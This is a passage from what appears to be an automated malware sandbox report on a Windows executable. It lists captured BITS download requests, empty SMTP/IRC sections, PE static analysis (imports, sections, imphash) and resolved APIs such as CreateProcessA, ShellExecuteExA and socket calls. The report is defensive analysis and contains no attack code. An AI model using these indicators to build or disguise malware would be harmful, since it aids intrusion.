  717. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  718. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=18438939-19888021\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  719. "port": 80
  720. },
  721. {
  722. "count": 1,
  723. "body": "",
  724. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  725. "user-agent": "Microsoft BITS/7.5",
  726. "method": "GET",
  727. "host": "r5---sn-tt1e7n7e.gvt1.com",
  728. "version": "1.1",
  729. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  730. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=19888022-20811638\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  731. "port": 80
  732. },
  733. {
  734. "count": 1,
  735. "body": "",
  736. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  737. "user-agent": "Microsoft BITS/7.5",
  738. "method": "GET",
  739. "host": "r5---sn-tt1e7n7e.gvt1.com",
  740. "version": "1.1",
  741. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  742. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=20811639-22252440\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  743. "port": 80
  744. },
  745. {
  746. "count": 1,
  747. "body": "",
  748. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  749. "user-agent": "Microsoft BITS/7.5",
  750. "method": "GET",
  751. "host": "r5---sn-tt1e7n7e.gvt1.com",
  752. "version": "1.1",
  753. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  754. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=22252441-23705723\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  755. "port": 80
  756. },
  757. {
  758. "count": 1,
  759. "body": "",
  760. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  761. "user-agent": "Microsoft BITS/7.5",
  762. "method": "GET",
  763. "host": "r5---sn-tt1e7n7e.gvt1.com",
  764. "version": "1.1",
  765. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  766. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=23705724-25236904\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  767. "port": 80
  768. },
  769. {
  770. "count": 1,
  771. "body": "",
  772. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  773. "user-agent": "Microsoft BITS/7.5",
  774. "method": "GET",
  775. "host": "r5---sn-tt1e7n7e.gvt1.com",
  776. "version": "1.1",
  777. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  778. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=25236905-26834675\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  779. "port": 80
  780. },
  781. {
  782. "count": 1,
  783. "body": "",
  784. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  785. "user-agent": "Microsoft BITS/7.5",
  786. "method": "GET",
  787. "host": "r5---sn-tt1e7n7e.gvt1.com",
  788. "version": "1.1",
  789. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  790. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=26834676-27861757\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  791. "port": 80
  792. },
  793. {
  794. "count": 1,
  795. "body": "",
  796. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  797. "user-agent": "Microsoft BITS/7.5",
  798. "method": "GET",
  799. "host": "r5---sn-tt1e7n7e.gvt1.com",
  800. "version": "1.1",
  801. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  802. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=27861758-29675521\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  803. "port": 80
  804. },
  805. {
  806. "count": 1,
  807. "body": "",
  808. "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  809. "user-agent": "Microsoft BITS/7.5",
  810. "method": "GET",
  811. "host": "r5---sn-tt1e7n7e.gvt1.com",
  812. "version": "1.1",
  813. "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  814. "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=29675522-30336767\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  815. "port": 80
  816. }
  817. ]
  818.  
  819. [*] Network Communication - SMTP: []
  820.  
  821. [*] Network Communication - Hosts: []
  822.  
  823. [*] Network Communication - IRC: []
  824.  
  825. [*] Static Analysis: {
  826. "pe": {
  827. "peid_signatures": null,
  828. "imports": [
  829. {
  830. "imports": [
  831. {
  832. "name": "VirtualAllocEx",
  833. "address": "0x41d00c"
  834. },
  835. {
  836. "name": "GetCommandLineW",
  837. "address": "0x41d010"
  838. },
  839. {
  840. "name": "GetOEMCP",
  841. "address": "0x41d014"
  842. },
  843. {
  844. "name": "GetCommandLineA",
  845. "address": "0x41d018"
  846. },
  847. {
  848. "name": "GetProcAddress",
  849. "address": "0x41d01c"
  850. },
  851. {
  852. "name": "LoadLibraryA",
  853. "address": "0x41d020"
  854. },
  855. {
  856. "name": "GetLastError",
  857. "address": "0x41d024"
  858. },
  859. {
  860. "name": "GetModuleHandleA",
  861. "address": "0x41d028"
  862. },
  863. {
  864. "name": "GetCurrentProcess",
  865. "address": "0x41d02c"
  866. },
  867. {
  868. "name": "GetProcessHeap",
  869. "address": "0x41d030"
  870. },
  871. {
  872. "name": "InterlockedIncrement",
  873. "address": "0x41d034"
  874. },
  875. {
  876. "name": "lstrlenA",
  877. "address": "0x41d038"
  878. },
  879. {
  880. "name": "GetVersionExA",
  881. "address": "0x41d03c"
  882. },
  883. {
  884. "name": "GetVersionExW",
  885. "address": "0x41d040"
  886. },
  887. {
  888. "name": "InterlockedDecrement",
  889. "address": "0x41d044"
  890. },
  891. {
  892. "name": "GetCurrentThread",
  893. "address": "0x41d048"
  894. },
  895. {
  896. "name": "GetTickCount",
  897. "address": "0x41d04c"
  898. },
  899. {
  900. "name": "GetStartupInfoW",
  901. "address": "0x41d050"
  902. }
  903. ],
  904. "dll": "KERNEL32.dll"
  905. },
  906. {
  907. "imports": [
  908. {
  909. "name": "DestroyWindow",
  910. "address": "0x41d058"
  911. },
  912. {
  913. "name": "RegisterClassW",
  914. "address": "0x41d05c"
  915. },
  916. {
  917. "name": "LoadIconA",
  918. "address": "0x41d060"
  919. },
  920. {
  921. "name": "SetWindowLongW",
  922. "address": "0x41d064"
  923. },
  924. {
  925. "name": "SetWindowTextW",
  926. "address": "0x41d068"
  927. },
  928. {
  929. "name": "DefWindowProcW",
  930. "address": "0x41d06c"
  931. },
  932. {
  933. "name": "CreateWindowExA",
  934. "address": "0x41d070"
  935. },
  936. {
  937. "name": "DestroyIcon",
  938. "address": "0x41d074"
  939. },
  940. {
  941. "name": "SendMessageW",
  942. "address": "0x41d078"
  943. },
  944. {
  945. "name": "CreateWindowExW",
  946. "address": "0x41d07c"
  947. },
  948. {
  949. "name": "UnregisterClassA",
  950. "address": "0x41d080"
  951. },
  952. {
  953. "name": "LoadStringW",
  954. "address": "0x41d084"
  955. },
  956. {
  957. "name": "PostMessageW",
  958. "address": "0x41d088"
  959. }
  960. ],
  961. "dll": "USER32.dll"
  962. },
  963. {
  964. "imports": [
  965. {
  966. "name": "CreateDIBSection",
  967. "address": "0x41d000"
  968. },
  969. {
  970. "name": "CreateBitmap",
  971. "address": "0x41d004"
  972. }
  973. ],
  974. "dll": "GDI32.dll"
  975. },
  976. {
  977. "imports": [
  978. {
  979. "name": "CoInitialize",
  980. "address": "0x41d0d8"
  981. },
  982. {
  983. "name": "CoGetObject",
  984. "address": "0x41d0dc"
  985. }
  986. ],
  987. "dll": "ole32.dll"
  988. },
  989. {
  990. "imports": [
  991. {
  992. "name": "__setusermatherr",
  993. "address": "0x41d090"
  994. },
  995. {
  996. "name": "_c_exit",
  997. "address": "0x41d094"
  998. },
  999. {
  1000. "name": "_except_handler3",
  1001. "address": "0x41d098"
  1002. },
  1003. {
  1004. "name": "_XcptFilter",
  1005. "address": "0x41d09c"
  1006. },
  1007. {
  1008. "name": "_cexit",
  1009. "address": "0x41d0a0"
  1010. },
  1011. {
  1012. "name": "exit",
  1013. "address": "0x41d0a4"
  1014. },
  1015. {
  1016. "name": "_wcmdln",
  1017. "address": "0x41d0a8"
  1018. },
  1019. {
  1020. "name": "__wgetmainargs",
  1021. "address": "0x41d0ac"
  1022. },
  1023. {
  1024. "name": "_initterm",
  1025. "address": "0x41d0b0"
  1026. },
  1027. {
  1028. "name": "_exit",
  1029. "address": "0x41d0b4"
  1030. },
  1031. {
  1032. "name": "_adjust_fdiv",
  1033. "address": "0x41d0b8"
  1034. },
  1035. {
  1036. "name": "__p__commode",
  1037. "address": "0x41d0bc"
  1038. },
  1039. {
  1040. "name": "__p__fmode",
  1041. "address": "0x41d0c0"
  1042. },
  1043. {
  1044. "name": "__set_app_type",
  1045. "address": "0x41d0c4"
  1046. },
  1047. {
  1048. "name": "_controlfp",
  1049. "address": "0x41d0c8"
  1050. },
  1051. {
  1052. "name": "__dllonexit",
  1053. "address": "0x41d0cc"
  1054. },
  1055. {
  1056. "name": "_onexit",
  1057. "address": "0x41d0d0"
  1058. }
  1059. ],
  1060. "dll": "msvcrt.dll"
  1061. }
  1062. ],
  1063. "digital_signers": null,
  1064. "exported_dll_name": null,
  1065. "actual_checksum": "0x0001d0b3",
  1066. "overlay": {
  1067. "size": "0x00001f08",
  1068. "offset": "0x0000c000"
  1069. },
  1070. "imagebase": "0x00400000",
  1071. "reported_checksum": "0x0001d0b3",
  1072. "icon_hash": null,
  1073. "entrypoint": "0x00404636",
  1074. "timestamp": "2016-08-19 14:55:52",
  1075. "osversion": "4.0",
  1076. "sections": [
  1077. {
  1078. "name": ".text",
  1079. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1080. "virtual_address": "0x00001000",
  1081. "size_of_data": "0x00004000",
  1082. "entropy": "5.74",
  1083. "raw_address": "0x00001000",
  1084. "virtual_size": "0x00003916",
  1085. "characteristics_raw": "0xf0000020"
  1086. },
  1087. {
  1088. "name": ".bss",
  1089. "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1090. "virtual_address": "0x00005000",
  1091. "size_of_data": "0x00000000",
  1092. "entropy": "0.00",
  1093. "raw_address": "0x00000000",
  1094. "virtual_size": "0x00017030",
  1095. "characteristics_raw": "0xc0000080"
  1096. },
  1097. {
  1098. "name": ".rdata",
  1099. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1100. "virtual_address": "0x0001d000",
  1101. "size_of_data": "0x00001000",
  1102. "entropy": "2.45",
  1103. "raw_address": "0x00005000",
  1104. "virtual_size": "0x000005dc",
  1105. "characteristics_raw": "0x40000040"
  1106. },
  1107. {
  1108. "name": ".data",
  1109. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1110. "virtual_address": "0x0001e000",
  1111. "size_of_data": "0x00005000",
  1112. "entropy": "6.48",
  1113. "raw_address": "0x00006000",
  1114. "virtual_size": "0x00004ef4",
  1115. "characteristics_raw": "0xd0000040"
  1116. },
  1117. {
  1118. "name": ".reloc",
  1119. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  1120. "virtual_address": "0x00023000",
  1121. "size_of_data": "0x00001000",
  1122. "entropy": "0.70",
  1123. "raw_address": "0x0000b000",
  1124. "virtual_size": "0x0000024e",
  1125. "characteristics_raw": "0x42000040"
  1126. }
  1127. ],
  1128. "resources": [],
  1129. "dirents": [
  1130. {
  1131. "virtual_address": "0x00000000",
  1132. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1133. "size": "0x00000000"
  1134. },
  1135. {
  1136. "virtual_address": "0x0001d104",
  1137. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1138. "size": "0x00000078"
  1139. },
  1140. {
  1141. "virtual_address": "0x00000000",
  1142. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1143. "size": "0x00000000"
  1144. },
  1145. {
  1146. "virtual_address": "0x00000000",
  1147. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1148. "size": "0x00000000"
  1149. },
  1150. {
  1151. "virtual_address": "0x0000c000",
  1152. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1153. "size": "0x00001f08"
  1154. },
  1155. {
  1156. "virtual_address": "0x00023000",
  1157. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1158. "size": "0x0000011c"
  1159. },
  1160. {
  1161. "virtual_address": "0x00000000",
  1162. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1163. "size": "0x00000000"
  1164. },
  1165. {
  1166. "virtual_address": "0x00000000",
  1167. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1168. "size": "0x00000000"
  1169. },
  1170. {
  1171. "virtual_address": "0x00000000",
  1172. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1173. "size": "0x00000000"
  1174. },
  1175. {
  1176. "virtual_address": "0x00000000",
  1177. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1178. "size": "0x00000000"
  1179. },
  1180. {
  1181. "virtual_address": "0x00000000",
  1182. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1183. "size": "0x00000000"
  1184. },
  1185. {
  1186. "virtual_address": "0x00000000",
  1187. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1188. "size": "0x00000000"
  1189. },
  1190. {
  1191. "virtual_address": "0x0001d000",
  1192. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1193. "size": "0x000000e4"
  1194. },
  1195. {
  1196. "virtual_address": "0x00000000",
  1197. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1198. "size": "0x00000000"
  1199. },
  1200. {
  1201. "virtual_address": "0x00000000",
  1202. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1203. "size": "0x00000000"
  1204. },
  1205. {
  1206. "virtual_address": "0x00000000",
  1207. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1208. "size": "0x00000000"
  1209. }
  1210. ],
  1211. "exports": [],
  1212. "guest_signers": {},
  1213. "imphash": "ed3432959df410bdf8d52780a8c0d1d3",
  1214. "icon_fuzzy": null,
  1215. "icon": null,
  1216. "pdbpath": null,
  1217. "imported_dll_count": 5,
  1218. "versioninfo": []
  1219. }
  1220. }
  1221.  
  1222. [*] Resolved APIs: [
  1223. "cryptbase.dll.SystemFunction036",
  1224. "uxtheme.dll.ThemeInitApiHook",
  1225. "user32.dll.IsProcessDPIAware",
  1226. "user32.dll.GetWindowContextHelpId",
  1227. "kernel32.dll.VirtualAlloc",
  1228. "kernel32.dll.VirtualProtect",
  1229. "kernel32.dll.LoadLibraryA",
  1230. "kernel32.dll.VirtualFree",
  1231. "kernel32.dll.VirtualQuery",
  1232. "advapi32.dll.GetUserNameA",
  1233. "kernel32.dll.AddAtomA",
  1234. "kernel32.dll.CloseHandle",
  1235. "kernel32.dll.CreateDirectoryA",
  1236. "kernel32.dll.CreateFileA",
  1237. "kernel32.dll.CreateProcessA",
  1238. "kernel32.dll.ExitProcess",
  1239. "kernel32.dll.FindAtomA",
  1240. "kernel32.dll.FreeLibrary",
  1241. "kernel32.dll.GetAtomNameA",
  1242. "kernel32.dll.GetComputerNameA",
  1243. "kernel32.dll.GetFileAttributesA",
  1244. "kernel32.dll.GetFileSize",
  1245. "kernel32.dll.GetModuleFileNameA",
  1246. "kernel32.dll.GetModuleHandleA",
  1247. "kernel32.dll.GetProcAddress",
  1248. "kernel32.dll.GetSystemDirectoryA",
  1249. "kernel32.dll.GetSystemInfo",
  1250. "kernel32.dll.GetTempPathA",
  1251. "kernel32.dll.GetVersionExA",
  1252. "kernel32.dll.GetVolumeInformationA",
  1253. "kernel32.dll.SetUnhandledExceptionFilter",
  1254. "kernel32.dll.Sleep",
  1255. "kernel32.dll.WaitForSingleObject",
  1256. "kernel32.dll.WriteFile",
  1257. "msvcrt.dll._itoa",
  1258. "msvcrt.dll._strlwr",
  1259. "msvcrt.dll.__getmainargs",
  1260. "msvcrt.dll.__p__environ",
  1261. "msvcrt.dll.__p__fmode",
  1262. "msvcrt.dll.__set_app_type",
  1263. "msvcrt.dll._cexit",
  1264. "msvcrt.dll._iob",
  1265. "msvcrt.dll._onexit",
  1266. "msvcrt.dll._setmode",
  1267. "msvcrt.dll.abort",
  1268. "msvcrt.dll.atexit",
  1269. "msvcrt.dll.atoi",
  1270. "msvcrt.dll.exit",
  1271. "msvcrt.dll.fclose",
  1272. "msvcrt.dll.fflush",
  1273. "msvcrt.dll.fopen",
  1274. "msvcrt.dll.fprintf",
  1275. "msvcrt.dll.fread",
  1276. "msvcrt.dll.free",
  1277. "msvcrt.dll.fwrite",
  1278. "msvcrt.dll.malloc",
  1279. "msvcrt.dll.memcpy",
  1280. "msvcrt.dll.memmove",
  1281. "msvcrt.dll.memset",
  1282. "msvcrt.dll.signal",
  1283. "msvcrt.dll.strcat",
  1284. "msvcrt.dll.strcmp",
  1285. "msvcrt.dll.strcpy",
  1286. "msvcrt.dll.strlen",
  1287. "msvcrt.dll.strncat",
  1288. "shell32.dll.ShellExecuteExA",
  1289. "user32.dll.GetSystemMetrics",
  1290. "wsock32.dll.WSACleanup",
  1291. "wsock32.dll.WSAStartup",
  1292. "wsock32.dll.closesocket",
  1293. "wsock32.dll.connect",
  1294. "wsock32.dll.gethostbyname",
  1295. "wsock32.dll.htons",
  1296. "wsock32.dll.inet_addr",
  1297. "wsock32.dll.inet_ntoa",
  1298. "wsock32.dll.recv",
  1299. "wsock32.dll.send",
  1300. "wsock32.dll.socket",
  1301. "shell32.dll.#680",
  1302. "kernel32.dll.GetNativeSystemInfo",
  1303. "kernel32.dll.SortGetHandle",
  1304. "kernel32.dll.SortCloseHandle"
  1305. ]
  1306.  
  1307. [*] Static Analysis: {
  1308. "pe": {
  1309. "peid_signatures": null,
  1310. "imports": [
  1311. {
  1312. "imports": [
  1313. {
  1314. "name": "VirtualAllocEx",
  1315. "address": "0x41d00c"
  1316. },
  1317. {
  1318. "name": "GetCommandLineW",
  1319. "address": "0x41d010"
  1320. },
  1321. {
  1322. "name": "GetOEMCP",
  1323. "address": "0x41d014"
  1324. },
  1325. {
  1326. "name": "GetCommandLineA",
  1327. "address": "0x41d018"
  1328. },
  1329. {
  1330. "name": "GetProcAddress",
  1331. "address": "0x41d01c"
  1332. },
  1333. {
  1334. "name": "LoadLibraryA",
  1335. "address": "0x41d020"
  1336. },
  1337. {
  1338. "name": "GetLastError",
  1339. "address": "0x41d024"
  1340. },
  1341. {
  1342. "name": "GetModuleHandleA",
  1343. "address": "0x41d028"
  1344. },
  1345. {
  1346. "name": "GetCurrentProcess",
  1347. "address": "0x41d02c"
  1348. },
  1349. {
  1350. "name": "GetProcessHeap",
  1351. "address": "0x41d030"
  1352. },
  1353. {
  1354. "name": "InterlockedIncrement",
  1355. "address": "0x41d034"
  1356. },
  1357. {
  1358. "name": "lstrlenA",
  1359. "address": "0x41d038"
  1360. },
  1361. {
  1362. "name": "GetVersionExA",
  1363. "address": "0x41d03c"
  1364. },
  1365. {
  1366. "name": "GetVersionExW",
  1367. "address": "0x41d040"
  1368. },
  1369. {
  1370. "name": "InterlockedDecrement",
  1371. "address": "0x41d044"
  1372. },
